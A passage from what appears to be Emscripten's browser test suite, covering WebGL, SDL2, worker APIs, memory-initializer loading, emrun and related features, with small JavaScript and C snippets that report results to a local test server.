self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-s', 'GL_FFP_ONLY=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_aniso(self):
if SPIDERMONKEY_ENGINE in JS_ENGINES:
# asm.js-ification check
Popen([PYTHON, EMCC, path_from_root('tests', 'aniso.c'), '-O2', '-g2', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types']).communicate()
self.set_setting('ASM_JS', 1)
self.run_generated_code(SPIDERMONKEY_ENGINE, 'a.out.js', assert_returncode=None)
print('passed asm test')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL'])
def test_openal_error(self):
for args in [[], ['--closure', '1']]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
for wasm in [0, 1]:
print(wasm)
main, supp = self.setup_runtimelink_test()
open('supp.cpp', 'w').write(supp)
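# build the side module (wasm or asm.js depending on the loop) and link it at runtime from the main module via RUNTIME_LINKED_LIBS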
Popen([PYTHON, EMCC, 'supp.cpp', '-o', 'supp.' + ('wasm' if wasm else 'js'), '-s', 'SIDE_MODULE=1', '-O2', '-s', 'WASM=%d' % wasm]).communicate()
self.btest(main, args=['-DBROWSER=1', '-s', 'MAIN_MODULE=1', '-O2', '-s', 'WASM=%d' % wasm, '-s', 'RUNTIME_LINKED_LIBS=["supp.' + ('wasm' if wasm else 'js') + '"]'], expected='76')
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
def test_mem_init(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write('''
var assert = function(check, text) {
if (!check) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?9');
xhr.onload = function() {
window.close();
};
xhr.send();
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''' % self.test_port)
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
def test_mem_init_request(self):
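# point Module.memoryInitializerRequest at the given URL and check the reported result (valid URL vs. missing file)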
def test(what, status):
print(what, status)
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.test_port)
self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
def test_runtime_misuse(self):
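# post_prep defines ccall/cwrap/direct-call helpers, post_test invokes them (expecting aborts unless expected_ok is set),
# and post_hook wires up myJSCallback() (called from main) and reports the accumulated result.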
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution will abort
} catch(e) {
out('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 1000);
''' % self.test_port
open('pre_runtime.js', 'w').write(r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [[], ['-s', 'WASM=1']]:
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'NO_EXIT_RUNTIME=0'] + extra_args + mode)
print('sync startup, call too late')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '--memory-init-file', '0', '-s', 'NO_EXIT_RUNTIME=0'] + extra_args + mode)
print('sync, runtime still alive, so all good')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js', '--memory-init-file', '0'] + extra_args + mode)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS=1', '--pre-js', path_from_root('tests', 'browser', 'cwrap_early.js'), '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["cwrap"]'], expected='0')
def test_worker_api(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]']).communicate()
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
run_process([PYTHON, EMCC, path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]', '--closure', '1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')
def test_worker_api_3(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]']).communicate()
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1']).communicate()
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('http.cpp', expected='0', args=['-I' + path_from_root('tests')])
# TODO: test only worked in non-fastcomp
@unittest.skip('non-fastcomp is deprecated and fails in 3.5')
def test_module(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'browser_module.cpp'), '-o', 'module.js', '-O2', '-s', 'SIDE_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two"]']).communicate()
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE=1', '-s', 'DLOPEN_SUPPORT=1'], expected='8')
def test_preload_module(self):
open('library.c', 'w').write(r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
run_process([PYTHON, EMCC, 'library.c', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'library.wasm', '-s', 'WASM=1'])
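# rename to .so so the file can be dlopen()ed as /library.so; the EM_ASM check below verifies the preload plugin instantiated it ahead of time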
os.rename('library.wasm', 'library.so')
main = r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return Module['preloadedWasm']['/library.so'] !== undefined;
);
if (!found) {
REPORT_RESULT(1);
return 1;
}
void *lib_handle = dlopen("/library.so", 0);
if (!lib_handle) {
REPORT_RESULT(2);
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
REPORT_RESULT(3);
return 3;
}
REPORT_RESULT(0);
return 0;
}
'''
self.btest(
main,
args=['-s', 'MAIN_MODULE=1', '--preload-file', '.@/', '-O2', '-s', 'WASM=1', '--use-preload-plugins'],
expected='0')
def test_mmap_file(self):
open(self.in_dir('data.dat'), 'w').write('data from the file ' + ('.' * 9000))
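# run with the default packaging and again with --no-heap-copy, covering both preloaded-data layouts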
for extra_args in [[], ['--no-heap-copy']]:
self.btest(path_from_root('tests', 'mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'] + extra_args)
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = run_process([PYTHON, path_from_root('emrun'), '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = run_process([PYTHON, path_from_root('emrun'), '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
# Deliberately named as test_zzz_emrun to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_emrun(self):
if not has_browser():
self.skipTest('need a browser')
Popen([PYTHON, EMCC, path_from_root('tests', 'test_emrun.c'), '--emrun', '-o', 'hello_world.html']).communicate()
outdir = os.getcwd()
# We cannot run emrun from the temp directory that the suite cleans up afterwards: the launched browser uses that directory
# as its startup directory, and since the browser does not close as part of the test it would pin down the cwd on Windows,
# making the directory impossible to delete. Therefore switch away from that directory before launching.
os.chdir(path_from_root())
args = [PYTHON, path_from_root('emrun'), '--timeout', '30', '--safe_firefox_profile', '--port', '6939', '--verbose', '--log_stdout', os.path.join(outdir, 'stdout.txt'), '--log_stderr', os.path.join(outdir, 'stderr.txt')]
browser = get_browser()
if browser is not None:
# If EMSCRIPTEN_BROWSER carried command line arguments to pass to the browser (e.g. "firefox -profile /path/to/foo"), those can't be passed via emrun, so strip them out.
browser_cmd = shlex.split(browser)
browser_path = browser_cmd[0]
args += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and '-profile' in browser_args:
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args += ['--browser_args', ' ' + ' '.join(browser_args)]
args += [os.path.join(outdir, 'hello_world.html'), '1', '2', '--3']
process = subprocess.Popen(args)
process.communicate()
stdout = open(os.path.join(outdir, 'stdout.txt'), 'r').read()
stderr = open(os.path.join(outdir, 'stderr.txt'), 'r').read()
assert process.returncode == 100
assert 'argc: 4' in stdout
assert 'argv[3]: --3' in stdout
assert 'hello, world!' in stdout
assert 'Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~' in stdout
assert 'Testing char sequences: %20%21 ä' in stdout
assert 'hello, error stream!' in stderr
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compiles.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut'], timeout=30)
def test_uuid(self):
# Run with ./runner.py browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues don't get minified out.
Popen([PYTHON, EMCC, '-O2', '--closure', '1', path_from_root('tests', 'uuid', 'test.c'), '-o', 'test.js', '-luuid'], stdout=PIPE, stderr=PIPE).communicate()
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = run_js('test.js', full_output=True)
print(out)
# Tidy up files that might have been created by this test.
try_delete(path_from_root('tests', 'uuid', 'test.js'))
try_delete(path_from_root('tests', 'uuid', 'test.js.map'))
# Now run test in browser
self.btest(path_from_root('tests', 'uuid', 'test.c'), '1', args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
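# regression test: adding and immediately removing a run dependency in preRun must still result in exactly one startup (expected '1')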
open('pre.js', 'w').write(r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js', '-o', 'test.html'], expected='1')
def test_html5(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5.c'), args=opts, expected='0', timeout=20)
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'], expected='0', timeout=20)
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0', timeout=20)
@requires_graphics_hardware
# Verify bug https://github.com/kripken/emscripten/issues/4556: creating a WebGL context on Module.canvas when no ID has been explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest(path_from_root('tests', 'webgl_create_context2.cpp'), args=['--shell-file', path_from_root('tests', 'webgl_create_context2_shell.html'), '-lGL'], expected='0', timeout=20)
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_destroy_context.cpp'), args=opts + ['--shell-file', path_from_root('tests/webgl_destroy_context_shell.html'), '-lGL'], expected='0', timeout=20)
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises an implementation-defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot actually read with')
self.btest(path_from_root('tests', 'webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0', timeout=20)
# Test for PR#5373 (https://github.com/kripken/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0', timeout=20)
def test_webgl2(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'] + opts, expected='0')
def test_webgl2_objects(self):
self.btest(path_from_root('tests', 'webgl2_objects.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
def test_webgl2_ubos(self):
self.btest(path_from_root('tests', 'webgl2_ubos.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=1'], expected='1')
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), expected='1')
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest(path_from_root('tests', 'webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'USE_WEBGL2=1', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest(path_from_root('tests', 'webgl_with_closure.cpp'), args=['-O2', '-s', 'USE_WEBGL2=1', '--closure', '1', '-lGL'], expected='0')
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_codemods(self):
# tests asm.js client-side code modifications
for opt_level in [0, 2]:
print('opt level', opt_level)
opts = ['-O' + str(opt_level), '-s', 'WASM=0']
# sanity checks, building with and without precise float semantics generates different results
self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=opts)
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=opts + ['-s', 'PRECISE_F32=1'])
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=opts + ['-s', 'PRECISE_F32=2', '--separate-asm']) # empty polyfill, but browser has support, so semantics are like float
def test_wget(self):
with open(os.path.join(self.get_dir(), 'test.txt'), 'w') as f:
f.write('emscripten')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'ASYNCIFY=1'])
print('asyncify+emterpreter')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'ASYNCIFY=1', '-s', 'EMTERPRETIFY=1'])
print('emterpreter by itself')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'])
def test_wget_data(self):
with open(os.path.join(self.get_dir(), 'test.txt'), 'w') as f:
f.write('emscripten')
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O2', '-g2'])
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O2', '-g2', '-s', 'ASSERTIONS=1'])
def test_locate_file(self):
for wasm in [0, 1]:
print('wasm', wasm)
self.clear()
open('src.cpp', 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
'''))
open('data.txt', 'w').write('load me right before...')
open('pre.js', 'w').write('Module.locateFile = function(x) { return "sub/" + x };')
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w')).communicate()
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
Popen([PYTHON, EMCC, 'src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)]).communicate()
os.mkdir('sub')
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print('in html')
open('shell.html', 'w').write('''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
Popen([PYTHON, EMCC, 'src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)] + args).communicate()
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
if not wasm:
open('src.cpp', 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
'''))
in_html('200')
@requires_graphics_hardware
def test_glfw3(self):
for opts in [[], ['-Os', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'glfw3.c'), args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
def test_asm_swapping(self):
self.clear()
open('run.js', 'w').write(r'''
Module['onRuntimeInitialized'] = function() {
// test proper initial result
var result = Module._func();
console.log('first: ' + result);
if (result !== 10) throw 'bad first result';
// load second module to be swapped in
var second = document.createElement('script');
second.onload = function() { console.log('loaded second') };
second.src = 'second.js';
document.body.appendChild(second);
console.log('second appended');
Module['onAsmSwap'] = function() {
console.log('swapped');
// verify swapped-in result
var result = Module._func();
console.log('second: ' + result);
if (result !== 22) throw 'bad second result';
Module._report(999);
console.log('reported');
};
};
''')
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2']]:
print(opts)
opts += ['-s', 'WASM=0', '--pre-js', 'run.js', '-s', 'SWAPPABLE_ASM_MODULE=1'] # important that both modules are built with the same opts
open('second.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'asm_swap2.cpp')).read()))
Popen([PYTHON, EMCC, 'second.cpp'] + opts).communicate()
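# extract the asm.js module from the second build (a.out.js) into second.js, in a form that can be swapped in at runtime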
Popen([PYTHON, path_from_root('tools', 'distill_asm.py'), 'a.out.js', 'second.js', 'swap-in']).communicate()
assert os.path.exists('second.js')
if isinstance(SPIDERMONKEY_ENGINE, list) and len(SPIDERMONKEY_ENGINE[0]) != 0:
out = run_js('second.js', engine=SPIDERMONKEY_ENGINE, stderr=PIPE, full_output=True, assert_returncode=None)
self.validate_asmjs(out)
else:
print('Skipping asm validation check, spidermonkey is not configured')
self.btest(path_from_root('tests', 'asm_swap.cpp'), args=opts, expected='999')
def test_sdl2_image(self):
# load an image file and get pixel data; also covers -O2 with --preload-file and memory init files
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
open(os.path.join(self.get_dir(), 'sdl2_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl2_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpeg'))
open(os.path.join(self.get_dir(), 'sdl2_image_jpeg.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_image_jpeg.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl2_image_formats(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
def test_sdl2_key(self):
for defines in [[]]:
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0, 0, c);
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl2_key.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_key.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_key.c'), '-o', 'page.html'] + defines + ['-s', 'USE_SDL=2', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''']).communicate()
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(charCode) {
